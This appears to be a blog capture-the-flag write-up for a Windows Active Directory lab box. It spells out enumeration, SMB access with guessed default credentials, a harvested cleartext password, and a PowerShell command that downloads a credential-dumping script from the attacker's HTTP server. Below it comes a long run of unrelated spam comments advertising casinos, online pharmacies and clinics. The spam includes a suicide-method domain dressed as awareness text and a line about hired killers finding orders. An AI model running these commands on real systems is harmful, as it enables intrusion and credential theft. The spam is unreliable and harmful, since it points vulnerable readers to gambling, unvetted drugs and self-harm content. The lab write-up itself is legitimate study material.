Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
As always, we’ll start with a basic nMap scan: nmap -sC -sV 10.10.10.X
As you can see, there’s a ton of stuff open on this Windows box. SMB 445, and the LDAP ports stand out for starters. With this in mind, we can use enum4linux to try to enemurate more information from this machine.
Type enum4linux without any flags to see what options are available. After reviewing the help file, we’ll want to use option -a. Thus, our command looks like this: enum4linux -a 10.10.10.X
Enum4linux can enumerate some basic Active Directory information, so that’s one of the reasons we chose to use it for our enumeration. Looking through the results we can see the usernames of some of the users on this box:
SMBClient
Since the SMB ports are open on our target machine, we can try to mount to any SMB shares that are on the computer using smbclient. Documentation is available here: https://www.tldp.org/HOWTO/SMB-HOWTO-8.html
You can type something like smbclient -L 10.10.10.X -U <username> to try to log in as a user. Obviously, this requires you knowing their password:
After trying several users, and several passwords that could be considered default, I was able to gain access with the user SABatchJobs and the password SABatchJobs
We can see here that there are several directories in it. So let’s use SMB to try to connect to one: smbclient //10.10.10.X/azure_uploads -U SABatchJobs
And there’s nothing in there, so let’s try the admin$ one: smbclient //10.10.10.X/admin$ -U SABatchJobs
And we can’t get in there, so let’s continue: smbclient //10.10.10.X/users$ -U SABatchJobs
And there’s some stuff. So let’s try digging into a few of the directories there:
And the 2nd one we look into there’s a file called azure.xml, so let’s get it and then see what we can find out about it. So type get azure.xml and it’ll download to your current directory on your Kali box.
And then cat the file from your Kali box.
And we’ve got a password, so let’s put this in a file so we can get to it quickly should we need it. echo 4n0therD4y@n0th3r$ > mhope_password.txt
Evil-WinRM
Now that we have a username and password, let’s see if we can leverage it to gain further acess to the computer. We’re going to use Evil-WinRM which takes advantage of Windows Remote Management. More information about it can be found here: https://github.com/Hackplayers/evil-winrm
But first, we’ve gotta install it. If you scroll down far enough on their website/GitHub page there’s instructions.
We can then run it with the following syntax: evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.X
From here, you can navigate to the Desktop and get the user.txt flag.
Getting Root
When we run the command whoami we can see that the user is part of a group that appears to have some type of administrator access, based on its name.
Utilizing Google, we come across a link that appears to dump Azure credentials using AD Connect
After some reading (and some trial and error) I came across a tool on GitHub that I think will do what I want it to: Azure-ADConnect.
We’ll start by navigating to the webpage and clicking on the Raw button
Next, copy the URL and then from your Kali terminal, do a wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
Now the problematic part, getting this script over to our target Windows machine.
Simple HTTP Server
I tried several ways initially to get this file over there. First, I tried using SMB. I created a new directory called smb and moved the Azure-ADConnect.ps1 file into it, and then setup my smbserver with the following command: impacket-smbserver <share name> <share path>
Then from the victum Windows machine I tried to connect map to my Kali’s smb drive with the following command: net use <drive letter to assign> <\\target IP\shared folder name> or net use t: \\10.10.14.17\smb
And there’s a security issue. Bummer. So I killed my smbserver on Kali and looked at the help file and lo and behold, there’s an option for SMB2 support: -smb2support
So we’ll update our command: impacket-smbserver -smb2support smb smb
And then try to re-map our drive to our Kali smb share:
And get told promptly to fuck off. Hrm. Sounds like a job for Python’s Simple HTTP server.
After killing the SMB server on my Kali box, I made sure I was in the same directory the .ps1 script was in and then started the Python HTTP server: python -m SimpleHTTPServer 80
And then from the Windows machine, we’ll use PowerShell to copy the script to our target machine: powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.17/Azure-ADConnect.ps1′,’C:\Users\mhope\Documents\Azure-ADConnect.ps1’)”
Next, we need to import the script/module we just copied into PowerShell: import-module ./Azure-ADConnect.ps1
And then we’ll run the script: Azure-ADConnect -server 127.0.0.1 -db ADSync
Now, we can kill our Evil-WinRM session and then re-establish it with the administrator account and the password we just discovered:
Navigate to the Desktop folder and there’s the root flag.
На территории Российской Федерации сертификация играет важную роль для подтверждения соответствия продукции установленным стандартам. Она необходима как для производителей, так и для потребителей. Наличие сертификата подтверждает, что продукция прошла все необходимые проверки. Особенно это актуально в таких отраслях, как пищевая промышленность, строительство и медицина. Прошедшие сертификацию компании чаще выбираются потребителями. Также сертификация может быть необходима для участия в тендерах и заключении договоров. Таким образом, соблюдение сертификационных требований обеспечивает стабильность и успех компании.
сертификация товаров
Merely wanna comment that you have a very nice website , I like the design and style it actually stands out.
На этом сайте вы найдете клинику психологического здоровья, которая предоставляет поддержку для людей, страдающих от стресса и других психологических расстройств. Эта комплексное лечение для восстановления ментального здоровья. Врачи нашего центра готовы помочь вам решить проблемы и вернуться к сбалансированной жизни. Опыт наших психологов подтверждена множеством положительных рекомендаций. Свяжитесь с нами уже сегодня, чтобы начать путь к лучшей жизни.
http://janicotte.com/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fz%2Fzopiklon%2F
На данной платформе вы найдете клинику психологического здоровья, которая предоставляет психологические услуги для людей, страдающих от тревоги и других ментальных расстройств. Наша комплексное лечение для восстановления ментального здоровья. Наши специалисты готовы помочь вам преодолеть трудности и вернуться к гармонии. Опыт наших врачей подтверждена множеством положительных обратной связи. Запишитесь с нами уже сегодня, чтобы начать путь к лучшей жизни.
http://life-is-exciting.net/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Ff%2Ffenibut%2F
Здесь вы найдете центр психологического здоровья, которая обеспечивает профессиональную помощь для людей, страдающих от стресса и других ментальных расстройств. Мы предлагаем индивидуальный подход для восстановления ментального здоровья. Врачи нашего центра готовы помочь вам преодолеть трудности и вернуться к гармонии. Опыт наших психологов подтверждена множеством положительных отзывов. Обратитесь с нами уже сегодня, чтобы начать путь к восстановлению.
http://lillyprimes.com/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fl%2Flamotridzhin%2F
Luxury timepieces have long been a benchmark of excellence. Meticulously designed by renowned brands, they combine heritage with modern technology.
All elements demonstrate unmatched attention to detail, from hand-assembled movements to high-end finishes.
Wearing a timepiece is a true statement of status. It signifies refined taste and uncompromising quality.
Whether you prefer a minimalist aesthetic, Swiss watches offer extraordinary reliability that lasts for generations.
http://www.mhdvmobilu.cz/forum/index.php?topic=308.new#new
Can I simply say what a aid to seek out someone who really knows what theyre speaking about on the internet. You positively know how one can convey an issue to gentle and make it important. Extra individuals must learn this and perceive this side of the story. I cant consider youre no more in style since you positively have the gift.
Our platform provides access to a wide selection of slot games, suitable for all types of players.
On this site, you can find retro-style games, feature-rich games, and huge-win machines with amazing animations and dynamic music.
If you are looking for easy fun or seek bonus-rich rounds, you’re sure to find something that suits you.
http://ar29.ru/pars/doms/iz_chego_moghno_sdelaty_abaghur.html
Every slot can be accessed around the clock, no download needed, and well adapted for both PC and mobile.
In addition to games, the site includes helpful reviews, bonuses, and community opinions to guide your play.
Join now, jump into the action, and get immersed in the excitement of spinning!
Suicide is a complex issue that affects millions of people across the world.
It is often associated with emotional pain, such as anxiety, hopelessness, or substance abuse.
People who struggle with suicide may feel isolated and believe there’s no solution.
how-to-kill-yourself.com
We must raise awareness about this matter and offer a helping hand.
Mental health care can make a difference, and finding help is a crucial first step.
If you or someone you know is struggling, please seek help.
You are not without options, and there’s always hope.
На этом сайте вы можете наслаждаться обширной коллекцией слотов.
Эти слоты славятся живой визуализацией и увлекательным игровым процессом.
Каждая игра даёт индивидуальные бонусные функции, улучшающие шансы на успех.
1xbet игровые автоматы
Слоты созданы для любителей азартных игр всех мастей.
Вы можете играть бесплатно, и потом испытать азарт игры на реальные ставки.
Попробуйте свои силы и окунитесь в захватывающий мир слотов.
Здесь вам открывается шанс наслаждаться обширной коллекцией игровых слотов.
Игровые автоматы характеризуются живой визуализацией и интерактивным игровым процессом.
Каждая игра даёт особые бонусные возможности, повышающие вероятность победы.
one win
Слоты созданы для любителей азартных игр всех мастей.
Можно опробовать игру без ставки, после чего начать играть на реальные деньги.
Проверьте свою удачу и получите удовольствие от яркого мира слотов.
This website offers a great variety of interior clock designs for your interior.
You can discover contemporary and traditional styles to fit your living space.
Each piece is hand-picked for its craftsmanship and functionality.
Whether you’re decorating a creative workspace, there’s always a beautiful clock waiting for you.
ihome app enhanced 30 pin speaker dock alarm clocks
Our catalog is regularly expanded with exclusive releases.
We care about customer satisfaction, so your order is always in good care.
Start your journey to enhanced interiors with just a few clicks.
Our platform makes available a wide range of medical products for home delivery.
You can quickly access needed prescriptions from anywhere.
Our inventory includes popular treatments and targeted therapies.
All products is provided by trusted distributors.
https://community.alteryx.com/t5/user/viewprofilepage/user-id/569324
We ensure quality and care, with private checkout and on-time dispatch.
Whether you’re looking for daily supplements, you’ll find safe products here.
Explore our selection today and get trusted healthcare delivery.
Платформа дает возможность трудоустройства по всей стране.
На сайте размещены разные объявления от разных организаций.
Система показывает предложения в различных сферах.
Полный рабочий день — всё зависит от вас.
Как киллеры находят заказы
Сервис легко осваивается и рассчитан на широкую аудиторию.
Оставить отклик очень простое.
Нужна подработка? — просматривайте вакансии.
This website, you can find a great variety of slot machines from leading developers.
Users can enjoy traditional machines as well as feature-packed games with vivid animation and interactive gameplay.
Even if you’re new or an experienced player, there’s something for everyone.
casino
All slot machines are ready to play round the clock and designed for PCs and smartphones alike.
All games run in your browser, so you can start playing instantly.
Site navigation is intuitive, making it convenient to find your favorite slot.
Register now, and dive into the world of online slots!
This website, you can find lots of casino slots from top providers.
Users can enjoy traditional machines as well as modern video slots with vivid animation and exciting features.
If you’re just starting out or a casino enthusiast, there’s always a slot to match your mood.
casino slots
All slot machines are instantly accessible anytime and compatible with PCs and mobile devices alike.
You don’t need to install anything, so you can get started without hassle.
The interface is intuitive, making it quick to browse the collection.
Sign up today, and enjoy the excitement of spinning reels!
Analog watches will forever stay fashionable.
They reflect engineering excellence and provide a mechanical beauty that modern gadgets simply fail to offer.
Every model is powered by tiny components, making it both accurate and elegant.
Aficionados appreciate the hand-assembled parts.
https://mail.u-turn.kz/forums.php?m=posts&q=29967&n=last
Wearing a mechanical watch is not just about practicality, but about making a statement.
Their aesthetics are timeless, often passed from one owner to another.
To sum up, mechanical watches will never go out of style.
On this platform, you can access lots of slot machines from famous studios.
Visitors can try out traditional machines as well as feature-packed games with vivid animation and interactive gameplay.
Whether you’re a beginner or a seasoned gamer, there’s something for everyone.
casino games
Each title are instantly accessible anytime and compatible with laptops and mobile devices alike.
All games run in your browser, so you can jump into the action right away.
The interface is easy to use, making it simple to explore new games.
Sign up today, and dive into the world of online slots!
It’s alarming to realize that 1 in 3 medication users commit preventable pharmaceutical mishaps due to lack of knowledge?
Your physical condition requires constant attention. Every medication decision you consider significantly affects your body’s functionality. Staying educated about the drugs you take is absolutely essential for successful recovery.
Your health goes far beyond swallowing medications. Every medication interacts with your physiology in potentially dangerous ways.
Remember these essential facts:
1. Taking incompatible prescriptions can cause health emergencies
2. Even common allergy medicines have potent side effects
3. Altering dosages undermines therapy
For your safety, always:
✓ Verify interactions via medical databases
✓ Read instructions completely before taking medical treatment
✓ Consult your doctor about potential side effects
___________________________________
For verified drug information, visit:
https://community.alteryx.com/t5/user/viewprofilepage/user-id/576202
The digital drugstore provides a broad selection of medications at affordable prices.
Customers can discover both prescription and over-the-counter remedies suitable for different health conditions.
We work hard to offer high-quality products at a reasonable cost.
Fast and reliable shipping guarantees that your purchase is delivered promptly.
Take advantage of shopping online on our platform.
kamagra jelly
This service allows adventure rides throughout Crete.
Anyone can easily book a ride for adventure.
Whether you’re looking to travel around hidden beaches, a buggy is the fun way to do it.
https://sites.google.com/view/buggy-crete
The fleet are ready to go and available for daily bookings.
Through our service is fast and comes with no hidden fees.
Begin the adventure and enjoy Crete on your own terms.
This website, you can access lots of slot machines from top providers.
Players can enjoy classic slots as well as new-generation slots with stunning graphics and exciting features.
Even if you’re new or a casino enthusiast, there’s a game that fits your style.
play aviator
All slot machines are available anytime and designed for PCs and mobile devices alike.
You don’t need to install anything, so you can start playing instantly.
The interface is easy to use, making it simple to explore new games.
Sign up today, and discover the world of online slots!